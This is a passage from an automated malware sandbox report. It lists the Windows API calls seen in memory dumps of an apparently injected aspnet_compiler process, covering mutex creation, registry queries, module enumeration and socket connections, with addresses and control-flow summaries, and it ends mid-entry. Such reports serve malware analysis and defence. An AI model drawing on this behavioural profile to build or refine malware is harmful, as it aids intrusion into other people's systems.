                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConnectionsEnum
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3832085198-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 180 5d41cc9-5d41d45 184 5d41d47 180->184 185 5d41d4a-5d41d53 180->185 184->185 186 5d41d55 185->186 187 5d41d58-5d41d61 185->187 186->187 188 5d41db2-5d41db7 187->188 189 5d41d63-5d41d87 CreateMutexW 187->189 188->189 192 5d41db9-5d41dbe 189->192 193 5d41d89-5d41daf 189->193 192->193
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 05D41D69
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1964310414-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 196 5d423f0-5d42481 200 5d42483-5d4248b RegOpenCurrentUser 196->200 201 5d424ce-5d424d3 196->201 202 5d42491-5d424a3 200->202 201->200 204 5d424d5-5d424da 202->204 205 5d424a5-5d424cd 202->205 204->205
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenCurrentUser.KERNELBASE(?,00000E2C), ref: 05D42489
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentOpenUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1571386571-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 209 134b639-134b6a3 213 134b6a5 209->213 214 134b6a8-134b6c2 209->214 213->214 216 134b6c4-134b6cc K32GetModuleInformation 214->216 217 134b70f-134b714 214->217 219 134b6d2-134b6e4 216->219 217->216 220 134b716-134b71b 219->220 221 134b6e6-134b70c 219->221 220->221
                                                                                                                                                                        APIs
                                                                                                                                                                        • K32GetModuleInformation.KERNEL32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134B6CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3425974696-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • MoveFileExW.KERNELBASE(?,?,?), ref: 05D40C39
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMove
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3562171763-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 0134B7D1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 514040917-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: select
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1274211008-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessTimes.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D41F2D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessTimes
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1995159646-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 05D42595
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegNotifyChangeKeyValue.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42694
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeNotifyValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3933585183-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenFileMappingW.KERNELBASE(?,?), ref: 05D419BD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMappingOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1680863896-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,00000E2C), ref: 05D4058B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 05D40EF9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0134B532
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42D01
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdaptersAddresses
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2506852604-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0134A989
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAEventSelect.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D422DA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EventSelect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 31538577-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 05D4278A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05D42EB2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Connect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3144859779-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134B5DA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumModulesProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1082081703-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 05D41D69
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1964310414-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAIoctl.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42111
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Ioctl
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3041054344-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0134AD6A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RasConnectionNotificationW.RASAPI32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D423B3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConnectionNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1402429939-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileType.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D40FE5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3081899298-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • setsockopt.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D41181
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: setsockopt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3981526788-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ioctlsocket.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42013
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ioctlsocket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3577187118-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134AA8C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • MkParseDisplayName.OLE32(?,00000E2C,?,?), ref: 0134AB7E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DisplayNameParse
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3580041360-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenFileMappingW.KERNELBASE(?,?), ref: 05D419BD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMappingOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1680863896-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 0134ACA8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 0134B040
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WSASocketW.WS2_32(?,?,?,?,?), ref: 05D41406
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Socket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 38366605-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileView
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3314676101-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • K32GetModuleInformation.KERNEL32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134B6CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3425974696-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenCurrentUser.KERNELBASE(?,00000E2C), ref: 05D42489
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentOpenUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1571386571-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D41728
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegNotifyChangeKeyValue.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42694
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeNotifyValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3933585183-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessTimes.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D41F2D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessTimes
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1995159646-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAEventSelect.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D422DA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EventSelect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 31538577-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134B5DA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
